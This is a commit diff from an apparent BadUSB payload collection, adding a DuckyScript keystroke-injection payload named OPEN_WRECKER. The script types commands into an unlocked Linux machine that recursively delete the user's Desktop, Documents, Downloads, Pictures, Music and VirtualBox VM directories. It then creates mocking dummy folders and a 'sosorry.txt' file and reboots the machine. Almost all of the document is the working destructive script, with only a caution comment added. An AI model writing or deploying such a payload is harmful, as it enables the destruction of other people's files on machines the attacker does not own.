Fixed script (would not work otherwise), added warning

This commit is contained in:
UberGuidoZ 2023-04-13 17:47:40 -07:00 committed by GitHub
parent 15a4a79c64
commit c6594866c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,27 +1,29 @@
REM Author: FLIZZ3R
REM TITLE: OPEN_WRECKER
REM OBJECTIVE: DESTRUCTIVE!CAUTION! wipe open linux machines Directories then create dummy directories and sorry text file**Added Reboot for shutdown :< shutdown -h now>:***
REM *** CAUTION *** This is a destructive payload. KNOW WHAT YOU'RE DOING BEFORE RUNNING.
REM OBJECTIVE: Wipe open linux machine directories then create dummy directories and sorry text file
REM ** Added Reboot for shutdown :< shutdown -h now>: ***
DELAY 500
WINDOWS d
DELAY 300
CTRL-ALT t
+DELAY 1500
+STRING rm -r Desktop Downloads Pictures #snap Documents Music Public Templates +++'VirtualBox VMs'
+ENTER
+DELAY 1500
DELAY 1500
STRING rm -r Desktop Downloads Pictures #snap Documents Music Public Templates +++'VirtualBox VMs'
ENTER
DELAY 1500
STRING mkdir Deskop downloadz Pics Dox ++Music Public TEMPS Vms
ENTER
+DELAY 500
+STRING cd Deskop
+ENTER
+DELAY 500
+STRING touch sosorry.txt
+ENTER
+ALT F4
+DELAY 100
+CTRL-ALT t
+DELAY 1000
+STRING reboot
+ENTER
:::FLIZZ3R@DISCORD)))
DELAY 500
STRING cd Deskop
ENTER
DELAY 500
STRING touch sosorry.txt
ENTER
ALT F4
DELAY 100
CTRL-ALT t
DELAY 1000
STRING reboot
ENTER
REM :::FLIZZ3R@DISCORD)))